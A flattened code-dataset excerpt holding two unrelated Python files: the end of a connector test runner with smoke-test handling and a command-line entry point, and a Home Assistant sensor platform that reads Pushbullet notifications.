disabled_smoke_tests = 0
total_smoke_tests = 0
smoke_tests_run = 0
absolute_start_time = time.time()
smoke_test_run_time = 0
if smoke_tests:
smoke_test_threads = min(len(smoke_tests), max_threads)
print("Starting smoke tests. Creating", str(smoke_test_threads), "worker threads.\n")
failed_smoke_tests, skipped_smoke_tests, disabled_smoke_tests, total_smoke_tests = test_runner(
smoke_tests, smoke_test_queue, smoke_test_threads)
smoke_tests_run = total_smoke_tests - disabled_smoke_tests
print("{} smoke test(s) ran. {} smoke tests disabled.".format(smoke_tests_run, disabled_smoke_tests))
smoke_test_run_time = round(time.time() - absolute_start_time, 2)
print("Smoke tests ran in {} seconds.".format(smoke_test_run_time))
if failed_smoke_tests > 0:
print("{} smoke test(s) failed. Please check logs for information.".format(failed_smoke_tests))
failing_ds = set(item.test_set.ds_name for item in smoke_tests if item.failed_tests > 0)
if require_smoke_test:
print("\nSmoke tests failed, exiting.")
sys.exit(1)
if require_smoke_test:
print("\nSmoke tests finished. Exiting.")
sys.exit(0)
if failing_ds and not force_run:
print("Tests for the following data source(s) will not be run: {}".format(', '.join(failing_ds)))
final_work = []
for item in all_work:
if not force_run:
if item.test_set.ds_name in failing_ds:
item.test_set.test_is_skipped = True
final_work.append(item)
test_queue.put(item)
print("\nStarting tests. Creating " + str(max_threads) + " worker threads.")
start_time = time.time()
failed_tests, skipped_tests, disabled_tests, total_tests = test_runner(final_work, test_queue, max_threads)
failed_tests += failed_smoke_tests
skipped_tests += skipped_smoke_tests
disabled_tests += disabled_smoke_tests
total_tests += total_smoke_tests
total_tests_run = total_tests - disabled_tests - skipped_tests
total_passed_tests = total_tests_run - failed_tests
now_time = time.time()
main_test_time = round(now_time - start_time, 2)
total_run_time = round(now_time - absolute_start_time, 2)
print('\nTest Count: {} tests'.format(total_tests))
print("\tPassed tests: {}".format(total_passed_tests))
print("\tFailed tests: " + str(failed_tests))
print("\tTests run: " + str(total_tests_run))
print("\tDisabled tests: " + str(disabled_tests))
print("\tSkipped tests: " + str(skipped_tests))
print("\nOther information:")
print("\tSmoke test time: {} seconds".format(smoke_test_run_time))
print("\tMain test time: {} seconds".format(main_test_time))
print("\tTotal time: {} seconds".format(total_run_time))
return failed_tests, skipped_tests, disabled_tests, total_tests
def get_ds_list(ds):
if not ds:
return []
ds_list = ds[0].split(',')
ds_list = [x.strip() for x in ds_list]
return ds_list
def run_desired_tests(args, ds_registry):
generate_files(ds_registry, False)
ds_to_run = ds_registry.get_datasources(get_ds_list(args.ds))
if not ds_to_run:
sys.exit(0)
if len(ds_to_run) > 0:
delete_output_files(os.getcwd())
if not tabquerycli_exists():
print("Could not find Tabquerycli.")
sys.exit(0)
max_threads = get_level_of_parallelization(args)
test_sets: List[TestSet] = []
for ds in ds_to_run:
ds_info = ds_registry.get_datasource_info(ds)
if not ds_info:
continue
print("Testing " + ds)
max_threads_per_datasource = ds_info.run_time_config.maxthread;
# if has multi datasource to run, then max_threads_per_datasource can not apply.
if max_threads_per_datasource > 0:
print("thread setting in " + ds + ".ini = " + str(max_threads_per_datasource))
if len(ds_to_run) == 1:
max_threads = max_threads_per_datasource
else:
print("Setting cannot apply since you are running multiple datasources.")
suite = ds
if args.command == 'run-pattern':
single_test, single_test_config = enqueue_single_test(args, ds_info, suite)
if single_test:
test_sets.extend([(single_test, single_test_config)])
else:
test_sets.extend(enqueue_tests(ds_info, args, suite))
failed_tests, skipped_tests, disabled_tests, total_tests = run_tests_impl(test_sets, max_threads, args)
return failed_tests
def run_connectors_test(args):
if not tabquerycli_exists():
print("Could not find Tabquerycli.")
sys.exit(0)
if not args.conn_test or not args.conn_test_file:
print("Missing arguments. Not running Connectors Test")
sys.exit(0)
if args.conn_test_password_file:
print(run_connectors_test_core( args.conn_test, args.conn_test_file, args.conn_test_password_file))
else:
print(run_connectors_test_core( args.conn_test, args.conn_test_file))
def run_file(run_file: Path, output_dir: Path, threads: int, args) -> int:
"""Rerun all the failed tests listed in the json file."""
logging.debug("Running failed tests from : " + str(run_file))
# See if we need to generate test setup files.
root_directory = get_root_dir()
failed_tests, skipped_tests, disabled_tests, total_tests = \
run_tests_impl(enqueue_failed_tests(run_file, root_directory, args), threads, args)
# This can be a retry-step.
return 0
def run_generate(ds_registry):
start_time = time.time()
generate_files(ds_registry, True)
end_time = time.time() - start_time
print("Done: " + str(end_time))
def main():
parser, ds_registry, args = init()
if args.command == 'action':
if args.setup:
print("Creating setup files...")
create_test_environment()
sys.exit(0)
elif args.add_ds:
add_datasource(args.add_ds, ds_registry)
generate_files(ds_registry, True)
sys.exit(0)
elif args.action_generate:
run_generate(ds_registry)
sys.exit(0)
elif is_test(args):
if args.generate:
run_generate(ds_registry)
# It's ok to call generate and then run some tests, so don't exit here.
if args.command == 'run-file':
output_dir = os.getcwd()
max_threads = get_level_of_parallelization(args)
sys.exit(run_file(Path(args.run_file), Path(output_dir), max_threads, args))
if args.command == 'run-connectors-test':
run_connectors_test(args)
sys.exit(0)
error_code = run_desired_tests(args, ds_registry)
sys.exit(error_code)
elif args.command == 'action' and args.diff:
tdvt_invocation = TdvtInvocation(from_args=args)
run_diff(tdvt_invocation, args.diff)
sys.exit(0)
elif args.command == 'list-logical-configs':
print_logical_configurations(ds_registry, args.list_logical_configs)
sys.exit(0)
elif args.command == 'list':
print_configurations(ds_registry, [args.list_ds], args.verbose)
sys.exit(0)
logging.error("Could not interpret arguments. Nothing done.")
parser.print_help()
sys.exit(-1)
if __name__ == '__main__':
main()
|
sensor.py
|
"""Pushbullet platform for sensor component."""
import logging
import threading
from pushbullet import InvalidKeyError, Listener, PushBullet
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_API_KEY, CONF_MONITORED_CONDITIONS
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
SENSOR_TYPES = {
"application_name": ["Application name"],
"body": ["Body"],
"notification_id": ["Notification ID"],
"notification_tag": ["Notification tag"],
"package_name": ["Package name"],
"receiver_email": ["Receiver email"],
"sender_email": ["Sender email"],
"source_device_iden": ["Sender device ID"],
"title": ["Title"],
"type": ["Type"],
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_API_KEY): cv.string,
vol.Optional(CONF_MONITORED_CONDITIONS, default=["title", "body"]): vol.All(
cv.ensure_list, vol.Length(min=1), [vol.In(SENSOR_TYPES)]
),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Pushbullet Sensor platform."""
try:
pushbullet = PushBullet(config.get(CONF_API_KEY))
except InvalidKeyError:
_LOGGER.error("Wrong API key for Pushbullet supplied")
return False
pbprovider = PushBulletNotificationProvider(pushbullet)
devices = []
for sensor_type in config[CONF_MONITORED_CONDITIONS]:
devices.append(PushBulletNotificationSensor(pbprovider, sensor_type))
add_entities(devices)
class PushBulletNotificationSensor(Entity):
"""Representation of a Pushbullet Sensor."""
def __init__(self, pb, element):
"""Initialize the Pushbullet sensor."""
self.pushbullet = pb
self._element = element
self._state = None
self._state_attributes = None
def update(self):
"""Fetch the latest data from the sensor.
This will fetch the 'sensor reading' into self._state but also all
attributes into self._state_attributes.
"""
try:
self._state = self.pushbullet.data[self._element]
self._state_attributes = self.pushbullet.data
except (KeyError, TypeError):
pass
@property
def name(self):
"""Return the name of the sensor."""
return f"Pushbullet {self._element}"
@property
def state(self):
"""Return the current state of the sensor."""
return self._state
@property
def extra_state_attributes(self):
"""Return all known attributes of the sensor."""
return self._state_attributes
class PushBulletNotificationProvider:
"""Provider for an account, leading to one or more sensors."""
def __init__(self, pb):
"""Start to retrieve pushes from the given Pushbullet instance."""
self.pushbullet = pb
self._data = None
self.listener = None
self.thread = threading.Thread(target=self.retrieve_pushes)
self.thread.daemon = True
self.thread.start()
def on_push(self, data):
"""Update the current data.
Currently only monitors pushes but might be extended to monitor
different kinds of Pushbullet events.
"""
if data["type"] == "push":
self._data = data["push"]
@property
def data(self):
"""Return the current data stored in the provider."""
return self._data
def retrieve_pushes(self):
"""Retrieve_pushes.
Spawn a new Listener and links it to self.on_push.
"""
self.listener = Listener(account=self.pushbullet, on_push=self.on_push)
_LOGGER.debug("Getting pushes")
try:
self.listener.run_forever()
finally:
self.listener.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.